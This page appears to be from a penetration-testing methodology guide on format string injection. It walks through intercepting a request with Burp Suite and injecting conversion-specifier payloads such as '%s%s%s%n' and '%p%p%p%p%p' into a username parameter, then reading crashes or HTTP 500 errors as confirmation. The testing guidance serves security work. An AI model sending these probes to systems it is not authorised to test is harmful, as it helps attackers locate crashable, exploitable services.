Format String Injection

Check List

Methodology

Black Box

Format string attack

Navigate to the target web application and identify an input parameter that is user-controllable, Normal request

GET /userinfo?username=unk9vvn HTTP/1.1
Host: target.com

Using Burp Suite, intercept the request and check whether the value of the username parameter is processed on the server side, Inject a payload containing Conversion Specifiers into the username parameter

%s%s%s%n

Injected request

GET /userinfo?username=%25s%25s%25s%25n HTTP/1.1
Host: target.com

Send the request and observe the server response to determine whether the application crashes or displays unexpected output, If needed, inject another payload containing different Conversion Specifiers

%p%p%p%p%p

Injected request

GET /userinfo?username=%25p%25p%25p%25p%25p HTTP/1.1
Host: target.com

Then observe the server response to determine whether an error such as HTTP 500 or a timeout occurs, If the application crashes or displays unexpected output, the vulnerability is confirmed

White Box

Cheat Sheet

PreviousInsecure Deserialization NextIncubated Vulnerability

Last updated 1 month ago

hashtagCheck List

hashtagMethodology

hashtagBlack Box

hashtagFormat string attack

hashtagWhite Box

hashtagCheat Sheet